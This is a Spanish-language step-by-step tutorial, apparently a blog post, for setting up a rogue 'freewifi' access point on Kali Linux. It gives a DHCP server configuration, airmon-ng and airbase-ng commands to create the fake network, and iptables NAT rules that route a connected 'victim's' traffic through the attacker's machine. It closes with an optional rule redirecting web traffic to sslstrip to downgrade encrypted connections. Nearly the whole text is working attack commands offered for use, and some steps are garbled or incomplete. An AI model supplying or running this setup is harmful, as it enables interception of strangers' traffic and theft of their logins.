En primer lugar, vamos a crear el
escenario siguiente:
10.0.0.0 → Red falsa.
192.168.1.0 → Red real.
eth0 → Tarjeta de red conectada a
internet.
wlan0 → Tarjeta de red que dará el
acceso wifi.
En primer lugar, deberemos instalar el
servidor dhcp
En kali Linux 2 Rolling, editaremos el
archivo de fuentes /etc/apt/sources.list
añadimos:
apt-get update
apt-get install isc-dhcp-server
editamos /etc//dhcpd/dhcpd.conf y
añadimos:
authoritative;
default-lease-time 1000;
max-lease-time 8000;
subnet 10.0.0.0 netmask 255.255.255.0 {
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;
option domain-name “freewifi”;
option domain-name-servers
IP_DEL_DNS_DE_TU_PROVEEDOR;
range 10.0.0.2 10.0.0.40;
}
Si tienes Kali Linux 2 o Rolling,
editamos el archivo /etc/NeworkManager/NetworkManager.conf y
añadimos:
[keyfile]
unmanaged-devices=interface-name:wlan0mon;interface-name:wlan1mon;interface-name:wlan2mon;interface-name:wlan3mon;interface-name:wlan4mon;interface-name:wlan5mon;interface-name:wlan6mon;interface-name:wlan7mon;interface-name:wlan8mon;interface-name:wlan9mon;interface-name:wlan10mon;interface-name:wlan11mon;interface-name:wlan12mon
ifconfig wlan0 up
airmon-ng start wlan0
airbase-ng -c 1 -e freewifi wlan0mon
Si usáis Virtual Box y os da un error,
probad con poner la habilitación USB 3.0 en la configuración de la
máquina virtual.
Abrimos una nueva terminal
Vamos poniendo lo siguiente:
ifconfig at0 10.0.0.1 netmask
255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask
255.255.255.0 gw 10.0.0.1
echo 1 >
/proc/sys/net/ipv4/ip_forward
iptables -F
iptables -t nat -A PREROUTING -p udp -j
DNAT --to 192.168.1.1
iptables -P FORWARD ACCEPT
iptables --append FORWARD
--in-interface at0 -j ACCEPT
iptables --table nat --append
POSTROUTING --out-interface eth0 -j MASQUERADE
dhcpd -cf /etc/dhcpd.conf -pf
/var/run/dhcpd.pid at0
Si os da un error, tenéis que poner
touch /var/lib/dhcp/dhcpd.leases y volvéis a poner dhcpd -cf
/etc/dhcpd.conf -pf /var/run/dhcpd.pid at0
/etc/init.d/isc-dhcp-server start
Si la víctima no consigue obtener la
IP, reinstalar aircrack-ng con apt-get install aircrack-ng para que
actualice airbase-ng.
Si queremos usar ssltrip u otro proxy,
deberemos, cuando configuremos iptables, poner también:
iptables -t nat -A PREROUTING -p tcp
--destination-port 80 -j REDIRECT --to-port 10000
(en el caso de sstrip. Usar la
configuración que sea para el proxy que utilicéis)-